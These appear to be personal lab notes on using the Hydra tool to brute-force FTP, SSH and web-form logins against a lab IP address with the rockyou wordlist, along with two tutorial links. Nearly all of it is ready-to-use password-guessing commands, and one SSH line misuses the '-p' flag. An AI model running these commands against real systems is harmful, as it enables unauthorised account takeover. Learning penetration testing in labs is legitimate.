·         https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/

    •  

 

From Kali box

https://linuxhint.com/crack-web-based-login-page-with-hydra-in-kali-linux/

A.      To brute force an FTP password

B.      hydra -l user -P passlist.txt ftp://10.10.31.82

C.      –l (lowercase is exact name) –L (List of names)

D.     ^user^ is username

E.      ^passlist.txt^ is full route to list of passwords

 

From Kali box

A.      To brute force ssh

B.      hydra -l <username> -P <full path to pass> 10.10.31.82 ssh –vv –f

C.      hydra –l molly –p /usr/share/wordlists/rockyou.txt 10.10.31.82 ssh –vV –f

 

From Kali box

A.      to brute force webpage

B.      hydra –l molly –P /usr/share/wordlists/rockyou.txt 10.10.31.82 http-post-form “/:username=^USER^&password=^PASS^:F=incorrect” –vV –f